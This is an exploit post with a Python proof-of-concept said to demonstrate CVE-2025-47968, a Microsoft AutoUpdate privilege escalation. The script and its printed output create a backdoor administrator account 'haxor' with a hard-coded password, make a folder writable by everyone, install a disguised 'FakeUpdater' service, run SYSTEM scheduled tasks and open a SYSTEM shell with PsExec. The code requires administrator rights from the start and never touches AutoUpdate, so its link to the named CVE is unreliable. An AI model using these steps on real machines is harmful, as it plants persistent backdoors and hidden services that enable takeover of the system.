# Titles: CVE-2025-47968-Core-Logic Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability # Author: nu11secur1ty # Date: 07/03/2025 # Vendor: https://www.microsoft.com/en-us # Software: https://www.microsoft.com/en-us/d/windows-11-pro/dg7gmgf0d8h4 # Reference: https://portswigger.net/web-security/access-control ## Description: This Python script simulates the core logic of CVE-2025-47968 on Windows systems. It demonstrates privilege escalation by: - Creating a new user `haxor` with administrative privileges. - Using NSSM (Non-Sucking Service Manager) to install and run a malicious service. - Leveraging scheduled tasks to escalate the user to SYSTEM-level privileges. - Launching a SYSTEM-level command shell using PsExec. ## Prerequisites - Windows system with administrative rights. - `nssm.exe` placed in `C:\nssm\nssm.exe`. - `psexec.exe` placed in the same directory as the Python script. - Python 3 installed. ## How It Works 1. Checks if the script is run with administrator privileges. 2. Creates directory `C:\Updater` and sets full permissions. 3. Drops a batch file to add the user `haxor` and add it to administrators. 4. Uses NSSM to install a service that runs this batch file. 5. Starts the service to create the user. 6. Uses scheduled tasks to add the user to administrators group as SYSTEM. 7. Creates a scheduled task to open a SYSTEM shell via PowerShell. 8. Runs PsExec to open an interactive SYSTEM command prompt. ## Usage Run the script as administrator: ```powershell python simulate_cve_2025_47968.py ``` Output should be: ``` [+] Created folder: C:\Updater [+] Running: icacls "C:\Updater" /grant Everyone:(OI)(CI)F /T processed file: C:\Updater processed file: C:\Updater\update.bat Successfully processed 2 files; Failed processing 0 files [+] Dropped malicious batch file at: C:\Updater\update.bat [+] Running: "C:\nssm\nssm.exe" stop FakeUpdater FakeUpdater: STOP: The operation completed successfully. [+] Running: "C:\nssm\nssm.exe" remove FakeUpdater confirm Service "FakeUpdater" removed successfully! [+] Running: "C:\nssm\nssm.exe" install FakeUpdater cmd.exe /c "C:\Updater\update.bat" Service "FakeUpdater" installed successfully! [+] Running: sc stop FakeUpdater [SC] ControlService FAILED 1062: The service has not been started. [*] Service not running or already stopped, continuing... [+] Running: sc start FakeUpdater SERVICE_NAME: FakeUpdater TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 1436 FLAGS : [*] Waiting 5 seconds for the batch to finish executing... [+] Success! User 'haxor' was created and added to administrators. [*] Attempting to escalate user to SYSTEM privileges... [+] Running: schtasks /Create /TN EscalateToSystem /TR "net localgroup administrators haxor /add" /SC ONCE /ST 00:00 /RL HIGHEST /F /RU SYSTEM WARNING: Task may not run because /ST is earlier than current time. SUCCESS: The scheduled task "EscalateToSystem" has successfully been created. [+] Running: schtasks /Run /TN EscalateToSystem SUCCESS: Attempted to run the scheduled task "EscalateToSystem". [+] Running: schtasks /Delete /TN EscalateToSystem /F SUCCESS: The scheduled task "EscalateToSystem" was successfully deleted. [+] Escalation task executed. 'haxor' should now have SYSTEM-level admin rights. [*] Attempting to open SYSTEM shell with psexec... [+] Running: "C:\Users\pwnedpc\Desktop\CVE-2025-47968\psexec.exe" -s -i cmd.exe PsExec v2.43 - Execute processes remotely Copyright (C) 2001-2023 Mark Russinovich Sysinternals - www.sysinternals.com ``` ## Important Notes - The script requires `nssm.exe` and `psexec.exe` in specified locations. - The SYSTEM shell opening may not always show a visible window due to system policies. - Use responsibly and only on systems you have permission to test. ## Disclaimer This code is for educational purposes only. Unauthorized use may violate laws and policies. # Reproduce: - Video: [href](https://www.youtube.com/watch?v=h64Rs45yuN4) - GitHub: [href]( https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47968) # Donate, if you are not ashamed! [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY) # Time spent: 03:15:00 Proof of Concept: #!/usr/bin/python # Python PoC – CVE-2025-47968 Core Logic (Windows Simulation) # nu11secur1ty 2025 import os import subprocess import ctypes import sys import time def is_admin(): try: return ctypes.windll.shell32.IsUserAnAdmin() except: return False def run(cmd): print(f"[+] Running: {cmd}") subprocess.run(cmd, shell=True, check=True) def check_user_exists(username): try: result = subprocess.run(f'net user {username}', shell=True, capture_output=True, text=True) return "The user name could not be found" not in result.stdout except: return False def check_user_in_admins(username): try: result = subprocess.run('net localgroup administrators', shell=True, capture_output=True, text=True) return username.lower() in result.stdout.lower() except: return False def escalate_to_system(username): task_name = "EscalateToSystem" cmd = f'net localgroup administrators {username} /add' create_task_cmd = ( f'schtasks /Create /TN {task_name} /TR "{cmd}" /SC ONCE /ST 00:00 /RL HIGHEST /F /RU SYSTEM' ) run(create_task_cmd) run(f'schtasks /Run /TN {task_name}') run(f'schtasks /Delete /TN {task_name} /F') def open_system_shell_with_psexec(): # psexec.exe is in the same directory as this script script_dir = os.path.dirname(os.path.abspath(__file__)) psexec_path = os.path.join(script_dir, "psexec.exe") if not os.path.isfile(psexec_path): print(f"[!] ERROR: psexec.exe not found at {psexec_path}. Download from https://learn.microsoft.com/en-us/sysinternals/downloads/psexec") return cmd = f'"{psexec_path}" -s -i cmd.exe' run(cmd) def main(): if not is_admin(): print("[!] Please run this script as Administrator.") sys.exit(1) nssm_path = r"C:\nssm\nssm.exe" if not os.path.isfile(nssm_path): print(f"[!] ERROR: nssm.exe not found at {nssm_path}") print("Download nssm from https://nssm.cc/download and place nssm.exe at this path.") sys.exit(1) vuln_path = r"C:\Updater" os.makedirs(vuln_path, exist_ok=True) print(f"[+] Created folder: {vuln_path}") run(f'icacls "{vuln_path}" /grant Everyone:(OI)(CI)F /T') batch_path = os.path.join(vuln_path, "update.bat") with open(batch_path, "w") as f: f.write("@echo off\n") f.write("net user haxor Passw0rd123 /add\n") f.write("net localgroup administrators haxor /add\n") print(f"[+] Dropped malicious batch file at: {batch_path}") service_name = "FakeUpdater" username = "haxor" try: run(f'"{nssm_path}" stop {service_name}') except subprocess.CalledProcessError: print("[*] Service not running or cannot stop (may not exist), continuing...") try: run(f'"{nssm_path}" remove {service_name} confirm') except subprocess.CalledProcessError: print("[*] Service may not exist yet, continuing...") run(f'"{nssm_path}" install {service_name} cmd.exe /c "{batch_path}"') try: run(f'sc stop {service_name}') except subprocess.CalledProcessError: print("[*] Service not running or already stopped, continuing...") run(f'sc start {service_name}') print("[*] Waiting 5 seconds for the batch to finish executing...") time.sleep(5) user_exists = check_user_exists(username) user_admin = check_user_in_admins(username) if user_exists and user_admin: print(f"[+] Success! User '{username}' was created and added to administrators.") print("[*] Attempting to escalate user to SYSTEM privileges...") escalate_to_system(username) print("[+] Escalation task executed. 'haxor' should now have SYSTEM-level admin rights.") print("[*] Attempting to open SYSTEM shell with psexec...") open_system_shell_with_psexec() elif user_exists: print(f"[!] User '{username}' was created but is NOT in administrators group.") else: print(f"[!] User '{username}' was NOT created. Something went wrong.") if __name__ == "__main__": main()